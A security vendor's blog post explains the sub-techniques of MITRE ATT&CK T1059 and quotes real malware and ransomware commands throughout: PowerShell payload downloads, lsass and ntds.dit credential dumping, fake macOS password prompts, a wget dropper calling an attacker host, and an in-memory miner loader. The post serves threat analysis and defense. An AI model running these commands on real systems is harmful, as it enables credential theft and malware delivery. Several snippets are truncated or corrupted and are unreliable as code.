Sub-techniques of Command and Scripting Interpreter Explained - MITRE ATT&CK T1059

The Red Report 2024

The Top 10 MITRE ATT&CK Techniques Used by Adversaries


In the Red Report 2024, we shared our insights on the top ten most prevalent MITRE ATT&CK techniques employed by adversaries. Following the publication of The Red Report 2024, we have initiated a blog series to delve into each of these ATT&CK techniques in more detail. This year, from a dataset of 600,000 observed malware samples, the Command and Scripting Interpreter technique stood out, accounting for 28% of cases. This translates to its presence in 174,118 malware samples, underlining its significant utilization by adversaries.

This blog post represents the second half of our series on the "Command and Scripting Interpreter" technique, where we dissect the subtechniques of this method. To explore the adversary use of T1059 Command and Scripting Interpreter technique, please click here for the first half of the blog.

Download the Red Report - Top Ten MITRE ATT&CK Techniques

MITRE ATT&CK T1059 Command and Scripting Interpreter

A Command and Scripting Interpreter is a technique that harnesses the capabilities of command and scripting interpreters. These interpreters are designed to interpret and execute instructions written in a specific programming or scripting language without requiring prior translation into machine code. Since no compilation process is involved, an interpreter executes the instructions within a given program sequentially, making it easier for adversaries to run arbitrary code.

A command interpreter is a type of software that enables users to input commands in a specific programming language to perform tasks on a computer. These commands are typically entered one at a time and executed immediately.

Operating systems come equipped with built-in command interpreters, often called "shells." Examples include the Windows Command Shell and PowerShell in Windows or the Unix Shell in Unix-like systems. Additionally, certain programming languages like Python, Perl, and Ruby have their command interpreters.

A scripting interpreter is a type of software that empowers users to create scripts in a specific scripting language. These scripts consist of a series of commands that can be executed sequentially to perform specific or a series of tasks.

Some well-known scripting languages include PowerShell and VBScript in Windows, Unix Shell in Unix-like systems, AppleScript in macOS, JavaScript, JScript, Python, Perl, or Lua.

In summary, command interpreters are suited for simple, one-time tasks that don't require complex logic or control structures. In contrast, scripting interpreters are tailored for handling more intricate tasks involving the execution of multiple commands in a specific order or under specific conditions. Some interpreters can function both as command interpreters and scripting interpreters, such as Python, Ruby, Perl, Bash, Zsh, Tcl, PowerShell, CShell, and Korn Shell. Adversaries leverage these interpreters to engage in various malicious activities, including writing and executing malicious scripts, executing command-line instructions, evading security controls, creating backdoors, and concealing the source code of malicious scripts.

#2.1. T1059.001 PowerShell

PowerShell, an integral scripting language within the Windows operating system, empowers system administrators to automate user account creation and management, alter system configurations, oversee services and processes, and execute diverse tasks with deep access to Windows internals. Given its extensive array of inherent capabilities, adversaries frequently incorporate PowerShell into their attack life-cycle.

Adversary Use of PowerShell

Adversaries frequently avoid installing and utilizing third-party programs on compromised hosts. Such actions can readily trigger correlated alerts in SIEM products or leave traces of their presence on the system. To evade detection and execute stealthy attacks, adversaries often use built-in command-line and scripting utilities rather than third-party programs for executing their commands. PowerShell is one of these native built-in tools commonly observed in adversaries' arsenals. 

Adversaries deploy PowerShell to conduct a broad spectrum of attack techniques:

1. Downloading and Executing Malicious Payloads

Adversaries often use PowerShell to download and execute arbitrary code and binaries remotely. For instance, in April 2023, the Vice Society ransomware gang ran the following PowerShell command on their victim's machine [2].

powershell.exe -ExecutionPolicy Bypass -file \\[redacted_ip]\s$\w1.ps1

By employing the -ExecutionPolicy Bypass flag, attackers cleverly circumvent the default safety mechanisms of PowerShell. This flag is crucial; without it, PowerShell would normally block scripts that haven't been digitally signed or vetted for safety, especially scripts from external sources. The w1.ps1 script is not run locally but rather fetched and executed directly from a remote location. This technique is a common trait in sophisticated cyberattacks, allowing attackers to execute malicious scripts hosted on a compromised or controlled server within the victim's network. It's a method that minimizes the footprint on the infected machine and often evades traditional file-based antivirus detection, as the malicious code doesn't need to be physically present on the target system.

In another example, the Lazarus group's Blacksmith operation, which took place in December 2023, involved the identification of the following PowerShell command responsible for downloading and executing HazyLoad [3].

powershell[.]exe -ExecutionPolicy ByPass -WindowStyle Normal (New-Object System[.]Net[.]WebClient).DownloadFile('hxxp[://]/inet[.]txt', 'c:\windows\adfs\de\inetmgr[.]exe');

This PowerShell command bypasses the usual execution policy to run scripts without restrictions and opens a normal window (not hidden) to execute its content. It creates a new instance of the System.Net.WebClient object, which is typically used to make web requests or download files. The script then uses this object to download a file from a specified URL (hxxp://inet.txt - the URL is obfuscated for safety reasons) and saves it as inetmgr.exe in a specific directory (c:\windows\adfs\de\). This behavior is often associated with downloading and executing a payload, potentially malicious, from a remote server.

2. Impair Defenses (ATT&CK T1562)

Adversaries often leverage PowerShell commands for defense evasion. For instance, in one of the files analyzed in June 2023 in a sandbox environment, we found the following PowerShell code in the file called file.exe [4].


Decoding the Base64 string, we would end up with the following command:

start-process -WindowStyle Hidden gpupdate.exe /force

Hence, the original command invokes PowerShell to execute a hidden, Base64-encoded command. The encoded portion, when decoded, launches the gpupdate.exe utility in a hidden window to forcefully update Group Policy settings on a Windows machine. Using -WindowStyle Hidden makes the process invisible to users, and encoding the command with Base64 helps obfuscate its purpose, a technique often used in scripts for both legitimate administrative functions and malicious activities.

In another example of malware analyzed in September 2023, we observed the following PowerShell command [5]. 

Powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xNkbicnVQzo.exe

3. Inditor Removal (ATT&CK T1070)

In September 2023, the Rhysida ransomware emerged as a significant threat, particularly impacting regions in the Middle East and Latin America. Our analysis of one of the samples revealed the following command:

cmd.exe /c start powershell.exe -WindowStyle Hidden -Command Sleep -Milliseconds 500; Remove-Item -Force -Path " " -ErrorAction SilentlyContinue;

This line of code initiates a PowerShell command with a built-in delay of 500 milliseconds. After this brief pause, it attempts to delete a specified file or directory. Notably, this action is executed with a high level of force, and it is designed to suppress any error messages that might normally appear, making its operation more stealthy and potentially more harmful.

Publicly Available PowerShell Tools Utilized by Threat Actors

PowerShell's extensive capabilities have made it a favored tool among red teamers and penetration testers, leading to the creation of powerful, publicly available frameworks and tools for red teaming and penetration testing. Prominent examples include:

  • Empire [6] for post-exploitation tactics, 
  • PowerSploit [7] for security testing, 
  • Nishang [8] with varied attack functionalities, 
  • PoshC2 [9] for server administration and post-exploitation, and 
  • Posh-SecMod [10] offering security and forensic tools.

#2.2. T1059.002 AppleScript 

AppleScript is a scripting language designed for macOS that enables users to automate tasks and control applications. It operates through AppleEvents, a communication method which, while powerful, can be exploited by adversaries to manipulate application functions and data for malicious purposes.

Despite their capabilities, it's important to recognize that AppleEvents, while unable to initiate remote applications, can interact with and manipulate already running applications. This allows for actions like interacting with open SSH connections, facilitating remote machine access, or creating deceptive dialog boxes. Additionally, AppleScript can leverage native APIs, particularly NSAppleScript or OSAScript, enhancing versatility and application in various scenarios from macOS version 10.10 Yosemite onwards.

For execution, the osascript command is used in the terminal. To run a script file, the command is osascript /path/to/AppleScriptFile, while osascript -e "script here" runs an AppleScript command directly. For instance, osascript -e 'tell app "System Events" to display dialog "System error detected!"' creates a fake error dialog, a tactic often used in social engineering attacks.

Adversary Use of AppleScript 

Adversaries can perform a variety of malicious activities by AppleScript.

1. Starting a Launch Daemon (T1543.004)

Adversaries can leverage the osascript to load and start a daemon [11].

osascript -e 'do shell script "sudo launchctl load -w /Library/LaunchDaemons/ && sudo launchctl start" with administrator privileges'

This command automates the activation of a daemon (background service) named questd, often without the user's knowledge. This is achieved by using AppleScript to execute a shell script with elevated rights, enabling the questd service to run automatically at system startup and potentially perform unwanted or harmful actions.

2. Credential Access with GUI Input Capture (T1056.002)

Adversaries can leverage AppleScript to lure victims into a GUI-based input capture to steal valid account credentials. For instance, in December 2023, macOS malware was observed leveraging the osascript to pop up a message prompting users to enter their credentials [12].

osascript -e 'display dialog "Required System Upgrade. Please enter passphrase for berri." default answer "" with icon caution buttons {"Continue"} default button "Continue" giving up after 150 with title "Application wants to install helper"'

Figure 1. Deceptive macOS Pop-up Prompting Users to Enter Their Credentials

The same tactic is observed in another macOS malware in November 2023 [13], leveraging osascript, which is crafted to display a dialog box that mimics a legitimate system upgrade notification.

osascript -e 'display dialog "Required System Upgrade. Please enter passphrase for root." default answer "" with icon caution buttons {"Continue"} default button "Continue" giving up after 150 with title "Application wants to install helper" with hidden answer'

The dialog box prompts the user to enter their root passphrase, ostensibly for a system upgrade, using persuasive language and design elements like a caution icon and official-sounding button labels. It's set to accept input with the answer hidden, similar to password fields. The script's intention is deceptive: it tries to trick the user into providing their sensitive root password under the guise of a necessary system action.

Download the Red Report - Top Ten MITRE ATT&CK Techniques

#2.3. T1059.003 Windows Command Shell

The Windows Command Shell, known as cmd.exe or cmd, is a core application embedded in the Windows operating system. It may not offer the advanced capabilities of PowerShell, but it remains a tool often exploited by adversaries for executing a variety of malicious activities. These activities include running arbitrary scripts, circumventing security measures, and facilitating lateral movements within networks.

Cmd is particularly adept at constructing and managing batch scripts saved as .bat or .cmd files. These batch files are text documents containing a series of commands for cmd.exe. When executed, they automate complex and repetitive tasks, such as user account management or performing systematic nightly backups. This functionality, while beneficial for legitimate use, also opens doors for misuse in malicious hands.

Adversary Use of Windows Command Shell

Adversaries frequently exploit cmd.exe in Windows, using it with the /c parameter followed by a specific option, as in cmd.exe /c <option>. The /c parameter instructs the command shell to execute the command outlined in the subsequent string. After executing this specified command, the shell automatically terminates. 

1. Credential Dumping (T1003.001)

According to a CISA report in May 2023, the BianLian ransomware group was observed to include the following command in their malware operations [1].  

cmd.exe /Q /c for /f "tokens=1,2 delims= " ^%A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump ^%B \Windows\Temp\<file>.csv full

This command string utilizes cmd.exe with the /Q and /c parameters to silently execute a complex operation targeting the lsass.exe process. The 'for /f' loop processes the output of 'tasklist', filtering for 'lsass.exe'. It then uses 'rundll32.exe' to invoke 'comsvcs.dll, MiniDump' to create a dump of the lsass.exe process. The dump is saved as a .csv file in the \Windows\Temp directory. The use of 'full' in the command specifies the type of dump to be created. This technique is often employed in malicious activities for extracting sensitive information from the lsass.exe process, which handles Windows authentication details.

Another credential dumping example is from the CISA's cybersecurity advisory (AA23-144A) on Volt Typhoon, released in May 2023 [14]. According to the report, china-based state-sponsored adversaries run the following commands consecutively to copy the ntds.dit file from a Windows domain controller. 

cmd /c vssadmin create shadow /for=C: > C:\Windows\Temp\<filename>.tmp

The first command uses vssadmin to create a shadow copy of the C: drive, redirecting the output to a temporary file in the Windows Temp directory. This shadow copy serves as a snapshot of the file system, including the ntds.dit file, which is usually locked during operation. 

cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\NTDS\ntds.dit C

The second command copies the ntds.dit file from the newly created shadow copy to a different location in the Temp directory. Using a shadow copy, the attacker circumvents the file lock on ntds.dit, which is the Active Directory database containing sensitive information like user credentials.

2. Privilege Escalation with Account Manipulation (T1098)

The BianLian ransomware group, as reported in May 2023, runs the following cmd commands [1]. The first command is used to activate the local Administrator account. The command directs standard output and standard error to a folder in the Windows Temp directory via network path addressing (\\C$\Windows\Temp<folder>).

cmd.exe /Q /c net user <admin> /active:yes 1> \\\C$\Windows\Temp\<folder> 2>&1

Following this, the malware changes the password for this activated account with the command cmd.exe /Q /c net user "<admin>"<password>. This also redirects the output to the same network path.

cmd.exe /Q /c net user "<admin>"<password> 1> \\\C$\Windows\Temp\<folder> 2>&1

Both commands are executed quietly, minimizing their visibility on the system.

3. Query Registry (T1012)

Adversaries often leverage cmd to modify the query registry. For instance, in one malware sample analyzed in October 2023 [15], we can see an example of how cmd can be used by adversaries to modify the registry.

C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V 

The command specifically targets the registry path where Windows stores details about network profiles. Using the /S parameter, the command recursively searches all subkeys and values within this registry path. The /V parameter ensures that all values under these keys are displayed. 

This can provide an attacker with information about networks the system has previously connected to, which can be valuable for further malicious activities. This kind of reconnaissance is often an initial step in a broader attack strategy to understand the environment and identify potential targets or vulnerabilities.

4. Disable or Modify Tools to Impair Defenses (T1562.001)

The following command is engineered to stop MySQL services on a system systematically [16]. 

The script identifies the MySQL installation path and uses the WMIC to locate and list MySQL services. Finally, it employs nested loops and WMIC commands to halt these identified services, confirming their termination and handling cases where services are already stopped or non-existent.

cmd.exe /S /V:ON /C \'echo off&set d=C:\\Program\' Files\\MySQL\\MySQL Server 8.0\'&FOR /f skip=1 %s in ('wmic service where ^'pathname like %!d:\\=\\\\!%^' get name ^| findstr /r ^.$') do ((for /L %k IN (1,1,20) do wmic service where 'name=%s and started=true' call stopservice | FIND /v \'No Instance 

An adversary may stop MySQL services on a system for various strategic reasons. Halting these services can facilitate data tampering or theft, making databases more vulnerable to unauthorized access. Disabling MySQL services can prevent the logging of suspicious activities, aiding in evasion. It can also set the stage for further attacks by weakening system defenses and enabling the installation of backdoors or other malware. Sometimes, the primary goal is to deny service, significantly impacting operations reliant on database availability.

#2.4. T1059.004 Unix Shell

The Unix shell, an essential command-line interface for Unix-like operating systems, incorporates several variants, including the Bourne Shell (sh), Bourne-Again Shell (bash), Z Shell (zsh), Korn Shell (ksh), and Secure Shell (SSH). These shells offer a range of commands and functionalities for efficient file management and program execution. 

The Unix shell is not just an interactive interface but also a scripting environment, allowing users to write scripts for automating tasks and system operations. Its scripting language supports various programming features such as conditional statements, loops, file operations, and variables, making it a versatile tool for system automation and management.

Adversary Use of Unix Shell

The Unix shell's versatile functionality and adaptability render it a valuable resource for both authorized users and malicious actors. Adversaries exploit the Unix shell to carry out diverse commands and deploy payloads, including malware or other malicious code, on a target system. Unix shell commands frequently feature prominently in the arsenal of techniques employed by adversaries in their attack campaigns.

1. File Execution

In September 2023, CISA released a malware analysis report analyzing five malware samples. One of the samples was the SUBMARINE backdoor [17].

Input (Name of the file)

chmod +x /root/mac*
sh /root/mach*\**

The file name is designed to exploit a vulnerability in the target environment where the base64 string within the file name will be executed on the Linux shell [41]. The malware first uses chmod +x to modify the permissions of directories or files in /root/mac*, granting executable rights. Subsequently, it employs the sh command to execute all files or scripts matching the pattern /root/mach*. This behavior pattern indicates an attempt to execute arbitrary code with elevated permissions.

2. Exploitation for Credential Access

Adversaries often leverage Unix Shell to exploit a vulnerability in the target system and exfiltrate sensitive information, including valid account credentials. For instance, in July 2024, the InfoSec community saw a fake Linux vulnerability exploit that dropped data-stealing malware on the victim's computer [18]. 

This fake PoC masquerades as a high-severity use-after-free exploit (CVE-2023-35829) by leveraging namespaces to create a fake root shell. However, instead of triggering the vulnerability, it utilizes this deceptive shell to buy time for hidden malware. Upon launch, the PoC creates a persistent "kworker" file in /etc/bashrc and contacts a C2 server to download a malicious Linux bash script via URL. This script then steals data from /etc/passwd, adds the attacker's SSH key to ~/ssh/authorized_keys for remote access, and exfiltrates the data via Essentially, the PoC acts as a trojan horse, deploying actual malware under the guise of a harmless exploit.

3. Exploitation for Remote Code Execution

Adversaries often leverage Unix Shell to download and execute commands on the target machine. 

For instance, the vulnerability CVE-2022-39952 in Fortinet's FortiNAC is exploited using the ‘configApplianceXml’ script [19], which unsets any 'cd' command alias and changes the working directory to root ('/'). It then uses the 'unzip' utility to extract an uploaded file ('upload.applianceKey') to the file system. Due to the working directory being root, attackers can craft a ZIP file to write arbitrary files anywhere in the file system, including '/etc/cron.d/'. This could be used to create a cron job that executes a reverse shell or other malicious commands with root privileges, granting full control to the attacker.

root@dev: /tmp/fnac940# cat bsc/campusgr/bin/configApplianceXml
unalias cd 2> / dev/null
cd /
VERSION=* /bsc/campusMgr/bin/getPlatformVersion*
if [ "$VERSION" = "0" ]
echo "This script is not supported on this version of firmware exit;
/usr/bin/unzip -o /bsc/campusMgr/config/upload.applianceKey

4. Downloading, Loading and Executing Malicious Payloads

In one malware campaign reported in March 2023, attackers deployed a bash script on infected routers to download three components: the malicious HiatusRAT, a legitimate network traffic capture tool 'tcpdump,' and additional payloads [20].  

The Hiatus bash script, shown in the below code snipped, is designed to execute on compromised routers, where it checks for the existence of a file named '.updata' in the '/database' directory. If the file exists and is executable, it runs it; if it exists but is not executable, the script changes the file permissions to make it executable and then runs it. If the file doesn't exist, the script downloads the payload from a specified URL to the '.updata' file, assigns execution permissions, and executes it. 

#! /bin/sh
moun= mount|grep "/dev/root on /proc/"• path="/database/updata"
pss=ps -aux|grep "c 20000 -p -n -sO -w" |grep -v grep* paths="/database/tinyproxy" i="1"
uuid= ifconfig|head -n 1|awk '{print $5}'|sed 's/://g'*
ProcNumber=$(ps -ef |grep "/bin/sh /database/update" |grep -v grep |we -1)
if [-e "Spath" ] then
if [ -x "Spath" ] then
/database/updata elif [! -X "$path" ]
chmod 777 / database/updata
elif [! -e "Spath" ]
wget hxxp://<attacker-ip>/tmp/qwert_8h_mips32 -0 /database/.updata chmod 777 /database/.updata

#2.5. T1059.005 Visual Basic

Visual Basic (VB) is a programming language initially developed by Microsoft, stemming from the BASIC language. Known for its user-friendly and straightforward nature, VB has gained popularity as a choice for application development and process automation. Its ability to interact with various technologies, such as the Component Object Model (COM) and the Native API, makes it a valuable tool for individuals with malicious intent, enabling them to execute code on targeted systems.

In addition to the core Visual Basic language, attackers also exploit related languages derived from it for scripting purposes, namely Visual Basic for Applications (VBA) and VBScript (Microsoft Visual Basic Scripting Edition).

VBA represents an implementation of the VB programming language, offering process automation, access to Windows API functions, and other low-level capabilities through dynamic link libraries (DLLs). VBA is embedded within most Microsoft Office applications, including Microsoft Excel, Microsoft Word, and Microsoft PowerPoint. Furthermore, it is accessible on the macOS platform, permitting users to automate tasks and develop custom applications within Office software.

VBScript, on the other hand, is a derivative of the VB programming language, empowering users to manipulate various aspects of a system using the COM. Initially designed for web developers, VBScript is a tool for web client scripting in Internet Explorer and web server scripting in Internet Information Services (IIS).

Adversary Use of Visual Basic

As a competent and versatile tool, Visual Basic is leveraged by adversaries to its fullest extent for malicious activities.

1. Downloading, Loading, and Executing Malicious Payloads

Sending a phishing email with an attachment containing malicious macro is a prevalent initial access technique among adversaries. 

For instance, between July and September 2023, the DarkGate malware [21] is propagated via phishing campaigns exploiting compromised Skype accounts. Attackers send messages with attachments containing malicious VBA scripts.

These scripts are disguised to appear legitimate within the context of the existing conversation, enticing victims to open them. Once executed, the VBA scripts trigger the download of further malicious components, leading to installing of the DarkGate payload on the victim's system. This method of using script attachments in phishing efforts highlights a sophisticated approach to bypass users' vigilance and deliver malware.

In the case of IceBreaker malware, as documented in a February 2023 security report [22], the threat targets online gaming and gambling companies through an intricate blend of phishing and social engineering tactics. The cyber attackers impersonate customers experiencing account access difficulties and coax customer service representatives into downloading a file, ostensibly an image detailing the user's issue. This file, deceptively presented and often housed on a fraudulent website, is actually a container for a ZIP archive that deploys a malevolent VBA script or a manipulated LNK file. When activated, the VBA script is engineered to establish a network connection to a remote server from which it retrieves and launches the IceBreaker backdoor or Houdini RAT—both remote access trojans.

2. Malicious Payload Obfuscation

Adversaries often use VB code because it can hide malicious scripts within seemingly harmless or irrelevant code, enabling them to bypass initial security scans. In a notable example from March 2023, disclosed in the TACTICAL#OCTOPUS operation, adversaries employed VB code to obfuscate malicious PowerShell scripts [23]. The obfuscated script and its obfuscation function are provided below.

Figure 2. TACTICAL#OCTOPUS’ Obfuscated Malicious VB Code [423].

#2.6. T1059.006 Python

Python, a high-level interpreted programming language, has gained popularity among adversaries for its simplicity and versatility. With its extensive standard library and cross-platform availability on various operating systems, Python serves as a valuable tool for automating processes, executing code, and interacting with different systems. Adversaries frequently employ Python to carry out a range of malicious activities.

Adversary Use of Python

The versatility and portability of Python render it a valuable asset for attackers in their operations. Python can seamlessly run on most operating systems and can be readily integrated into various tools and frameworks.

1. Resource Hijacking (T1496)

Adversaries can leverage Python scripting for resource hijacking. For instance, PyLoose is a Python-based fileless malware that targets cloud workloads with a focus on executing a cryptominer directly in memory [24]. It gains initial access through vulnerable Jupyter Notebook services, which allow the execution of Python code and system commands. The malware is fetched from a public paste site using HTTPS, circumventing file system-based detection by loading directly into the Python runtime's memory. The script is concise, with only nine lines of code that decode and decompress an XMRig miner payload, then execute it in-memory using Linux's memfd feature, which creates file-like memory objects.

import ctypes, os, base64, zlib
1 = ctypes. CDLL (None)
5 = 1.syscall
c = base64.b64decode(b'eNrsvX1cV0X30H4HGBZFZ3CLzI…)
e = zlib. decompress (c)
f = s(319, ' ', 1)
os write(f, e)
p = '/proc/self/fd/%d' % f
os. execle(p, 'smd', {})

This method of execution is stealthy, as it leaves no traditional file system footprint, making detection and forensic investigation difficult. The attack is sophisticated, employing evasion techniques and demonstrating an advanced level of threat actor skill, indicative of an adversary with significant capabilities in targeting cloud environments.

2. Persistence and Malicious Code Execution

In August 2023, the National Police of Spain warned of an ongoing LockBit Locker ransomware campaign targeting architecture companies through phishing emails [25].

In their attack campaigns, the attackers send emails from a made-up domain. They pretend to be a photography store looking for renovation plans to build trust with their targets. Once trust is established, they propose a meeting and provide an IMG file containing a disguised Windows shortcut. When this shortcut is activated, it triggers a Python script that checks for admin privileges.

Figure 2. Malicious Python Script of LockBit Locker Ransomware [25].

If admin rights are present, the script establishes persistence mechanisms on the system and executes the ransomware, encrypting the user's files. In cases where admin rights are absent, the script employs a UAC bypass technique to execute the ransomware with elevated privileges.

The sophistication of this campaign lies in its ability to convincingly mimic legitimate business inquiries, thereby evading standard anti-phishing defenses employed by companies.

#2.7. T1059.007 JavaScript

JavaScript, a high-level language used for interactive web pages and applications, follows the ECMAScript specification for cross-browser compatibility. However, its widespread use and flexibility also make it a tool for malicious actors to execute phishing, spread malware, and extract sensitive data, exploiting web browser and application vulnerabilities.

JScript, developed by Microsoft, serves as their version of the ECMAScript standard, functioning in a manner akin to JavaScript. This scripting language is woven into various elements of the Windows operating system, including the Component Object Model and the Internet Explorer HTML Application (HTA) pages. The Windows Script engine processes JScript, which is frequently used to enhance web pages with dynamic and interactive elements.

JavaScript for Automation (JXA) serves as a macOS scripting language grounded in JavaScript and is an integral component of Apple's Open Scripting Architecture (OSA). Debuting in macOS 10.10, JXA stands as one of the two languages endorsed by OSA, alongside AppleScript. JXA possesses the capability to govern applications, interact with the operating system, and tap into macOS's internal APIs. To execute JXA scripts, one can employ the osascript command-line utility, compile them into applications or script files using osacompile, or trigger their execution in-memory via other programs, facilitated by the OSAKit Framework.

Adversary Use of JavaScript

Adversaries leverage JavaScript for a variety of malicious purposes.

1. Drive-by Compromise (T1189)

 When it comes to the Drive by Compromise (T1189) technique, adversaries commonly leverage JavaScripting. 

For instance, as disclosed in October 2023, adversaries are leveraging JavaScript within the Binance Smart Chain (BSC) as part of a sophisticated attack method named EtherHiding to distribute malicious code [26]. This tactic involves hacking WordPress sites and then using them to load malicious JavaScript code that fetches further harmful scripts stored on the BSC. 

// include <hxxps://>
async function load() {
  let provider = new ethers.providers.JsonRpcProvider("hxxps://"),
      signer = provider.getSigner(),
      address = "0x7f36D9292e7c70A204faC2d255475A861487c60",
      ABI = [
        { inputs: [{ internalType: "string", ........}], },
        { inputs: [], name: "get", ........},
        { inputs: [], name: "link", ........ }
      contract = new ethers.Contract(address, ABI, provider),
      link = await contract.get();
window.onload = load;

Because smart contracts on the blockchain are immutable and distributed, they cannot be easily removed or censored once malicious code is uploaded. This makes the attack particularly resilient to takedown attempts. Furthermore, the decentralized nature of blockchain allows hackers to easily modify their malicious payloads or command and control server addresses without incurring any costs, thereby maintaining their operations efficiently and evasively. The victims are typically unaware of these processes running in the background when they visit compromised sites, which display fake update prompts that, if interacted with, can lead to the downloading of malicious executables.

2. Defense Evasion

In the malware campaign reported in December 2023, attackers utilized a JavaScript code block to perform targeted injections to capture banking data [27]. The script conducts a preliminary check to ensure it executes only if the adrum token is not present in the URL, which is likely a measure to block specific security solutions that might use this token as a marker. The execution flow is contingent on the document's loading status; it either invokes specific obfuscated functions immediately if the document is already loaded or defers execution until after the DOMContentLoaded event.

if ((document.location.href + '').indexOf('adrum') == -1) {
    try {
        if (document.readyState != 'loading') {
            if (history.hLizsIory.test_) {
        } else {
            document.addEventListener('DOMContentLoaded', function () {
                if (history.hLizsIory.test_) {
                var dfgt_ = null;
    } catch (e) {}
} else {}

The object history.hLizsIory, which features prominently in this code, seems to serve as a facade for the underlying malicious operations, with methods like Loaded() and checks against a test_ property. These could trigger the script's core functionality, which might include reporting load status back to a command-and-control server, manipulating the DOM to capture user input, or even inserting additional scripts for further exploitation.

The script's design is cunningly adaptive, performing checks to selectively trigger execution and avoid running in environments where it might be detected. It's capable of responding to the browser's load status and can adjust its behavior on the fly—this finesse in operation allows it to evade many traditional security scans that look for more blatant or static forms of malicious activity. The script presents a formidable challenge for defense mechanisms by handling exceptions quietly and blending into the expected flow of browser events.

Download the Red Report - Top Ten MITRE ATT&CK Techniques

#2.8. T1059.008 Network Device

Access to CLIs is typically achieved by utilizing a terminal emulator program with the device's IP address and corresponding username and password. Upon successful login, users can input commands to perform various tasks, such as inspecting or modifying device configurations, monitoring real-time statistics and data, or observing the device's performance. CLIs generally provide an array of device-specific and operating system-specific commands.

Adversary Use of Network Device CLI

Network device Command Line Interfaces (CLIs) represent a common focal point for adversaries seeking to manipulate the functionality of network devices.

Various methods exist through which adversaries attempt to gain unauthorized access to a network device's CLI. One prevalent approach involves employing brute force attacks, wherein the adversary systematically tests different combinations of usernames and passwords to ascertain the correct credentials. This process can be automated using specialized tools. Discovering the credentials for a network device may prove straightforward, as many users neglect to change default usernames and passwords.

Exploiting these CLIs by adversaries enables them to modify network device behavior to their advantage, potentially leading to unauthorized actions and disruptions in network operations.

1. Impair Defenses (T1562)

For instance, by executing the following command sequence, an adversary could hinder the network administrators' ability to detect anomalous activities or operational problems, as critical logs and alerts that would normally appear on the console are suppressed.

2. Local Code Execution

The following command sequence on a network device, such as a router or switch, reconfigures the device to boot from a malicious operating system image named malicious_ios.bin

configure terminal
boot system flash:/malicious_ios.bin

This process begins by entering configuration mode, changing the boot file to the malicious one, and then rebooting the device. Once rebooted, the device operates under the control of this compromised system, making it vulnerable to network attacks.

3. Remote Code Execution and Data Exfiltration

Adversaries commonly leverage Network Device CLIs for executing remote code and exfiltrating data, exploiting these interfaces as critical vectors for cyber attacks and network surveillance.

For instance, as disclosed in April 2023, Russian state-sponsored APT28 hackers have been deploying Jaguar Tooth, a custom malware on Cisco IOS routers, which particularly exploits the CLI of these devices [28]. Once installed, this malware creates a process named Service Policy Lock that executes a series of CLI commands, such as show running-config, show version, and several others, to collect detailed information about the router's configuration and network environment. 

show running-config
show version
show ip interface brief
show arp
show cdp neighbors
show start
show ip route
show flash

This data is then exfiltrated using TFTP, enabling the hackers to gain extensive insight into the network infrastructure. This tactic exemplifies adversaries' strategic use of network device CLI for espionage and surveillance purposes, highlighting the criticality of securing network device interfaces against unauthorized access.

#2.9. T1059.009 Cloud API

Cloud Application Programming Interfaces (APIs) have emerged as pivotal elements in modern cloud computing, offering a comprehensive means for programmatically interacting with a wide array of cloud services. These APIs, integral to cloud environments like AWS, Azure, and Google Cloud Platform (GCP), provide functionalities spanning various domains such as compute, storage, identity and access management (IAM), networking, and security policies. 

Accessible through multiple interfaces, including command line interpreters (CLIs), browser-based Cloud Shells, and PowerShell modules like Azure for PowerShell, these APIs facilitate seamless integration and management of cloud resources. Additionally, software development kits (SDKs) for popular programming languages like Python further streamline the use of these APIs, enabling developers to embed cloud functionalities directly into their applications.

Adversary Use of Cloud API

The versatile nature of cloud APIs, while beneficial for legitimate management and automation, also opens up avenues for exploitation by adversaries. These APIs, when accessed with appropriate permissions (like Application Access Tokens or Web Session Cookies), can be used to carry out a range of actions that could compromise cloud environments. Malicious actors can exploit these interfaces to execute commands or scripts remotely, potentially affecting multiple aspects of a cloud tenant's infrastructure. The accessibility of these APIs, through both cloud-hosted and on-premises hosts or via browser-based cloud shells provided by cloud platforms, amplifies the risk. The cloud shells, in particular, offer a unified environment for using CLI and scripting modules, which, if misused, can lead to significant security breaches within the cloud infrastructure.

1. Remote Code Execution

Adversaries often leverage cloud APIs for remote code execution. For instance, in a cyber incident disclosed in December 2022, adversaries exploited a vulnerability in Google Home smart speakers by leveraging the cloud API to gain unauthorized control [29].

The attackers manipulated the device's local HTTP API to add a rogue user account, enabling them to send remote commands via the cloud API. This process involved disconnecting the device from its network, obtaining crucial device information like its name, certificate, and cloud ID, and then using this data to link their account to the victim's device.

With this access, the attackers could remotely activate the speaker's microphone, eavesdrop on conversations, and execute other commands, such as controlling smart home devices or making unauthorized online purchases. This exploitation of the cloud API for malicious purposes underscores the potential security risks associated with interconnected smart devices and the critical need for robust security measures in IoT ecosystems.

2. Downloading, Loading and Executing Malicious Payloads

Adversaries can leverage cloud APIs for downloading, loading and executing malicious payloads on the victim system. For instance, in their latest campaign disclosed in June 2023, the Chinese state-sponsored hacking group APT15 [30], known for targeting global public and private organizations, has deployed a novel backdoor named Graphican. This sophisticated malware leverages the Microsoft Graph API and OneDrive for its C&C operations, using these cloud services to stealthily obtain encrypted C&C infrastructure addresses. 

This method provides Graphican with enhanced versatility and resilience against takedown attempts. By authenticating with the Microsoft Graph API, Graphican can access and decrypt specific OneDrive folder names to use as C&C server addresses. This innovative use of legitimate cloud APIs for malicious purposes marks a significant evolution in APT15's tactics, allowing them to execute various commands remotely, including file creation, downloading, and running interactive command lines, thereby maintaining their reputation as a formidable threat in cyberspace.

3. Enumerating High-Value User Accounts

One usage of cloud APIs can be enumerating high-value user accounts. For instance, in February 2023, the S1deload Stealer malware campaign, targeting YouTube and Facebook users, uniquely leveraged the Facebook Graph API to enhance its malicious operations [31]. 

Once a user's Facebook account is compromised, the malware uses the Graph API to evaluate the account's value by checking if the victim administers any Facebook pages or groups, has paid for ads, or is connected to a business manager account. This strategic use of the Graph API allows the malware to prioritize accounts with greater reach or financial value, optimizing its impact for spreading further or more targeted exploitation. This approach demonstrates sophisticated integration with legitimate social media infrastructure to facilitate and amplify malicious activities.


[1] “StopRansomware: BianLian Ransomware Group,” Cybersecurity and Infrastructure Security Agency CISA.

[2] R. Chapman, “Vice Society: A Tale of Victim Data Exfiltration via PowerShell, aka Stealing off the Land,” Unit 42, Apr. 13, 2023.

